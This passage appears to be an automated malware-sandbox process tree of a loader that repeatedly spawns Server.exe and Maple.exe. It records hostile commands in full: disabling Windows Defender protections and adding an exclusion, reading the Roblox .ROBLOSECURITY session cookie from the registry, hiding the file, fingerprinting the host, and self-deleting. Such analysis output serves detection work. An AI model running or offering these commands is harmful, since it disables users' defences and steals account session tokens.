        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        35⤵
        
        PID:1080
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        35⤵
        Detects videocard installed
        
        PID:5196
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        35⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5512
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        34⤵
        Checks computer location settings
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        35⤵
        System Location Discovery: System Language Discovery
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        35⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        35⤵
        Checks computer location settings
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        36⤵
        System Location Discovery: System Language Discovery
        
        PID:5380
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        36⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        36⤵
        Checks computer location settings
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        37⤵
        System Location Discovery: System Language Discovery
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        37⤵
        Drops file in Drivers directory
        
        PID:1540
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:2004
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        38⤵
        Views/modifies file attributes
        
        PID:1120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        38⤵
        
        PID:4488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        38⤵
        
        PID:2332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        38⤵
        
        PID:2328
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:5684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        38⤵
        
        PID:1620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        38⤵
        Detects videocard installed
        
        PID:2420
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5904
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        37⤵
        Checks computer location settings
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        38⤵
        System Location Discovery: System Language Discovery
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        38⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        38⤵
        Checks computer location settings
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        39⤵
        System Location Discovery: System Language Discovery
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        39⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        39⤵
        Checks computer location settings
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        40⤵
        System Location Discovery: System Language Discovery
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        40⤵
        Drops file in Drivers directory
        
        PID:5068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:4192
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        41⤵
        Views/modifies file attributes
        
        PID:3528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:5596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        41⤵
        
        PID:1904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        41⤵
        
        PID:216
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:704
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        41⤵
        Detects videocard installed
        
        PID:2124
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1892
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        40⤵
        Checks computer location settings
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        41⤵
        System Location Discovery: System Language Discovery
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        41⤵
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        41⤵
        Checks computer location settings
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        42⤵
        System Location Discovery: System Language Discovery
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        42⤵
        Drops file in Drivers directory
        
        PID:5300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:2228
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        43⤵
        Views/modifies file attributes
        
        PID:4588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        43⤵
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        
        PID:5864
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        43⤵
        
        PID:5784
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        43⤵
        
        PID:2668
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:4848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        43⤵
        Detects videocard installed
        
        PID:5688
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3176
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        42⤵
        Checks computer location settings
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        43⤵
        System Location Discovery: System Language Discovery
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        43⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        43⤵
        Checks computer location settings
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        44⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        44⤵
        Checks computer location settings
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        45⤵
        Drops file in Drivers directory
        
        PID:4884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        46⤵
        
        PID:3684
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        46⤵
        Views/modifies file attributes
        
        PID:2204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        46⤵
        
        PID:5840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        46⤵
        
        PID:3872
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        46⤵
        
        PID:1836
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        46⤵
        
        PID:5816
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        46⤵
        
        PID:5160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        46⤵
        
        PID:5960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        46⤵
        Detects videocard installed
        
        PID:3528
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5932
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        47⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:324
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        45⤵
        Checks computer location settings
        
        PID:432
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        46⤵
        System Location Discovery: System Language Discovery
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        46⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        46⤵
        Checks computer location settings
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        47⤵
        System Location Discovery: System Language Discovery
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        47⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        47⤵
        Checks computer location settings
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        48⤵
        System Location Discovery: System Language Discovery
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        48⤵
        Drops file in Drivers directory
        
        PID:5172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:1480
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        49⤵
        Views/modifies file attributes
        
        PID:3156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        
        PID:4272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        49⤵
        
        PID:5748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        49⤵
        
        PID:4212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:3356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        49⤵
        Detects videocard installed
        
        PID:3672
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        49⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5040
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        48⤵
        Checks computer location settings
        
        PID:5724
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        49⤵
        System Location Discovery: System Language Discovery
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        49⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        49⤵
        Checks computer location settings
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        50⤵
        System Location Discovery: System Language Discovery
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        50⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        50⤵
        Checks computer location settings
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        51⤵
        System Location Discovery: System Language Discovery
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        51⤵
        Drops file in Drivers directory
        
        PID:4260
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:3880
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        52⤵
        Views/modifies file attributes
        
        PID:4288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:4636
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        52⤵
        
        PID:4648
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        52⤵
        
        PID:4768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:4152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2432
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        52⤵
        Detects videocard installed
        
        PID:6108
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        52⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:236
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        53⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:332
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        51⤵
        Checks computer location settings
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        52⤵
        System Location Discovery: System Language Discovery
        
        PID:5864
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        52⤵
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        52⤵
        Checks computer location settings
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        53⤵
        System Location Discovery: System Language Discovery
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        53⤵
        Drops file in Drivers directory
        
        PID:4448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        54⤵
        
        PID:2228
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        54⤵
        Views/modifies file attributes
        
        PID:2908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        54⤵
        
        PID:1568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        54⤵
        
        PID:4500
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        54⤵
        
        PID:1692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        54⤵
        
        PID:5688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        54⤵
        Detects videocard installed
        
        PID:2624
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3740
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        55⤵
